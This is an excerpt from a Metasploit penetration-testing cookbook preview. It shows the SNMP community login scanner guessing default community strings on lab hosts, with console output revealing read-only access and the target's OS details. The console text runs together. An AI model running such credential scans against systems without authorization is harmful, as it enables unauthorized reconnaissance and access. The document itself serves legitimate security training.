How to do it...

  1. The SNMP Community Login Scanner auxiliary module logs into SNMP devices using common community names:
msf > use auxiliary/scanner/snmp/msf > use auxiliary/scanner/snmp/snmp_login msf auxiliary(snmp_login) > set RHOSTS 192.168.216.10,129RHOSTS => 192.168.216.10,129msf auxiliary(snmp_login) > run[+] 192.168.216.10:161 - Login Successful: public (Access level: read-only); Proof (sysDescr.0): Hardware: Intel64 Family 6 Model 70 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.1 (Build 7601 Multiprocessor Free)[*] Scanned 1 of 2 hosts (50% complete)[*] Scanned 2 of 2 hosts (100% complete)[*] Auxiliary module execution completedmsf auxiliary(snmp_login) >
  1. We can gather loads of information using SNMP scanning modules, ...

Get Metasploit Penetration Testing Cookbook - Third Edition now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.